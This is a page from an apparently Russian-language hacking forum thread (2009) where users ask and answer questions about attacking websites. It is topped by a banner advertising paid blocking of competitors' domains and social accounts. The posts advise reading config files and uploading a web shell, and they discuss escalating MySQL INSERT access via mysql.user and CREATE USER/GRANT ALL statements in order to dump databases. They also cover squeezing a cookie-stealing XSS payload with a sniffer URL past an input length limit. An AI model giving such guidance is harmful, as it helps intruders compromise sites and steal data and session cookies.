Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 801 из 1393

801

Опции темы

Поиск в этой теме

Опции просмотра

#8001

07.07.2009, 15:08

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Файлы читать можешь? Можешь. Ищи админку, пытайся зайти, лей шелл. Ищи конфиги, читай, думай

#8002

07.07.2009, 15:52

genadiez

Познающий

Регистрация: 26.12.2008

Сообщений: 42

Провел на форуме:
211850

Репутация: 59

Доброго дня всем.
Подскажите пожалуйста:

Можно ли имея доступ к MySQL базе данных c правами INSERT каким либо образом (специально сконструированным запросом) поднять эти самые права, так, чтобы можно было базу данных слить?
Или это не выполнимая задача?

Заранее извиняюсь, если вопрос покажется глупым, просто разбираюсь в SQL-injection методом проб и ошибок (язык SQL знаю плохо

)

#8003

07.07.2009, 18:08

RedX

Познающий

Регистрация: 12.06.2008

Сообщений: 32

Провел на форуме:
324402

Репутация: 22

Отправить сообщение для RedX с помощью ICQ

Для того что бы слить базу нужны права SELECT. Insert это уже для правки базы данных..

#8004

07.07.2009, 22:10

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

Провел на форуме:
1754802

Репутация: 380

Цитата:

Сообщение от genadiez

)

гранты с INSERT без SELECT - это изврашения и наврятли там нет SELECT грантов ибо в конструкции INSERT допустим SELECT(депенд оф версион оф корс), а насчет дампа - тут либо с помошью скрипта(программы при удаленном конекте) локально/удаленно(если разрешенно в конфиге для данного Юзера и порт ничем не прикрыт) либо если еще есть в добавок file_priv дампить в файловую систему и сливать.

#8005

07.07.2009, 22:25

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

insert into mysql.user values(...)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#8006

07.07.2009, 23:20

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Цитата:

Сообщение от Spyder

insert into mysql.user values(...)

Это типо можно создать ещё одного юзера или у меня глюки o_O
Щя посмотрю, если это так то приведу пример
ps
Нашёл тока

Цитата:

CREATE USER 'antichat'@'%' IDENTIFIED BY '****';

GRANT ALL PRIVILEGES ON * . * TO 'antichat'@'%' IDENTIFIED BY '****' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;

ps2
**** = 0000

Последний раз редактировалось Ctacok; 07.07.2009 в 23:22..

#8007

07.07.2009, 23:23

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

Провел на форуме:
1754802

Репутация: 380

Цитата:

Сообщение от Ctacok

Это типо можно создать ещё одного юзера или у меня глюки o_O
Щя посмотрю, если это так то приведу пример

Угу, если прав хватит работать с mysql(если уже SELECT нету то я сомневаюмь что к mysql есть доступ).

#8008

07.07.2009, 23:24

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

да да, можно юзера создать типа, а вообще проще так
http://www.mysql.ru/docs/man/Adding_users.html

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#8009

08.07.2009, 00:15

Damned_one

Новичок

Регистрация: 24.11.2008

Сообщений: 24

Провел на форуме:
338992

Репутация: 44

Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>

Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie

это? помогите пожалуста... мозги спарились уже

#8010

08.07.2009, 00:16

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Запрос метода GET или POST?
Вааще если GET то врядтле ограничят.
А если через POST то в инпуте есть ограничение.
Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.

Последний раз редактировалось Ctacok; 08.07.2009 в 00:20..

Страница 801 из 1393

801

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход